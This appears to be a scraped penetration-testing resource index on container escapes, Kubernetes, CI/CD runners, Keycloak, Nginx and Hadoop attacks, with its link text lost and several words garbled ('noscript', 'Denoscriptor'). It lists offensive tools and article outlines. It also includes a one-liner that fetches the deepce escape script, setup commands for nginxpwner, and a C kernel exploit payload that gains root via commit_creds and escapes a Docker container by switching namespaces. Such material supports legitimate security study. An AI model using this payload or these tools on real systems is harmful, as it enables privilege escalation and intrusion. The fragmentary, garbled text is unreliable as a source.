* Link
* Link

* Link
* Link

* Reconnaissance - Link
* Abusing GitLab Runners - Link
* Script for steal tasks by requesting them faster than a real runner - Link

* deepce - noscript for Enumeration, Escalation of Privileges and Container Escapes written in pure sh

* CDK - K8s, Docker penetration toolkit

* botb - analysis and exploitation tool also being CI/CD friendly with common CI/CD technologies

* amicontained - Useful tool to get the privileges the container has in order to find ways to escape from it

* grype - Get the CVEs contained in the software installed in the image

* linpeas - It can also enumerate containers

(echo -ne "GET /stealthcopter/deepce/main/deepce.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: close\r\n\r\n"; sleep 3) | openssl s_client -connect raw.githubusercontent.com:443 -quiet > deepce.sh

cd /tmp
tee -a getFile.sh
<copy+paste the contents of the getFile.sh noscript>
<hit enter and the ctrl-d/cmd-d>
cat getFile.sh

URL=http://localhost:8000/file OUTPUT=file ./get.sh

git clone https://github.com/stark0de/nginxpwner
cd nginxpwner
sudo docker build -t nginxpwner:latest .
sudo docker run -it nginxpwner:latest /bin/bash

* Gets Ngnix version and gets its possible exploits using searchsploit and tells if it is outdated

* Throws a wordlist specific to Nginx via gobuster

* Checks if it is vulnerable to CRLF via a common misconfiguration of using $uri in redirects

* Checks for CRLF in all of the paths provided

* Checks if the PURGE HTTP method is available from the outside

* Checks for variable leakage misconfiguration

etc

* Visualize network policies and pods in a interactive network map

* Scan cluster identify pods without network policies

* Create default deny network policies where this is missing

* Get suggestions for network policies based on existing workloads

* admin
* dpapi
* http
* mssql
* smb

* Am I Testing Keycloak?
* Keycloak Version Information
* OpenID Configuration /SAML Denoscriptor
* Realms (Enumeration && Self-Registration Enabled)
* Client IDs
* Scopes
* Grants
* Identity Providers
* Roles
* User Email Enumeration

Reconnaissance
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion

Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* email
* address
* phone

* passwords
* history
* cookies
* bookmarks
* download history
* localStorage
* extensions

* Complications of talking about Kubernetes security
* Managed and unmanaged Kubernetes distributions
* Areas of discussion

* Kubernetes components and ports
- Unmanaged Kubernetes
- Managed Kubernetes
* Securing Kubernetes APIs

* Kubernetes authentication principles
- Internal Kubernetes authentication methods
- Static token authentication
- Bootstrap tokens
- X.509 client certificates
- Service account tokens
* External authentication methods
- OpenID Connect (OIDC)
- Webhook token authentication
- Authenticating proxy
- Impersonating proxy
* Authentication for other Kubernetes components
- Kubelet
- Controller manager and scheduler
- Kube-proxy
- Etcd

* Kubernetes authorization principles
* Kubernetes authorization modules
- AlwaysAllow and AlwaysDeny
- Node Authorizer
- ABAC
- RBAC
- Webhook
* Authorization for other Kubernetes components
- Kubelet
- Scheduler and Controller Manager

* Admission control overview
- Internal admission controllers
- External admission controllers
* Risks of implementing external admission control
- Using admission control for pod security

* Network trust zones
* Introduction to CNI
* Managing network access in Kubernetes
* Securing the cluster network
* Conclusion
* Appendix - Setting up a demonstration environment

* Tools, Techniques and Procedures to attack an Hadoop environment

* Key vulnerabilities on Hadoop components (Hadoop Common, HDFS, YARN etc.)

* Key vulnerabilities in third-party components often used in Hadoop environments

* Authenticate using Keytab
* Impersonate Another Hadoop Service
* HDFS Command Cheat Sheet
* RCE

* A Python noscript that parses Nmap XML output and stores the data in an SQLite database.

* A Grafana Docker container with a pre-configured dashboard for visualizing the Nmap scan data.

void get_root_payload( void) {

        ((_commit_creds)(COMMIT_CREDS))(
                ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
        );

        // -------- NAMESPACE DOCKER EXPLOIT  --------
        // copy nsproxy from init_nsproxy to pid 1 of the container
        unsigned long long g = ((_find_task_vpid)(FIND_TASK))(1);

        // now, do the magic.... !!!! Simple black magic doesn't work on current process!!!!
        ((_switch_task_namespaces)(SWITCH_TASK_NS))(( void *)g, (void *)INIT_NSPROXY);

        // prepare the two namespace FDs by opening the respective files
        long fd = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
        ((_sys_setns)(SYS_SETNS))( fd, 0);

        fd      = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
        ((_sys_setns)(SYS_SETNS))( fd, 0);
}

CVE-2025-24514 - auth-url Annotation Injection
CVE-2025-1097 - auth-tls-match-cn Annotation Injection
CVE-2025-1098 - mirror UID Injection
CVE-2025-1974 - NGINX Configuration Code Execution

* A Standard Poisoned Pipeline

* Shared Docker-in-Docker Runners and Privileged Containers

* The Shared Instance-Level Runner

* Attacking Docker-in-Docker Shared Runners

* Remediation - Hardening the CI/CD Infra

* Shell Executors

* What is eBPF?
* Lifetime of an eBPF program
* kprobes, uprobes, and tracepoints
* eXpress Data Path (XDP)
* Traffic Control (TC)
* Prevention
* Detection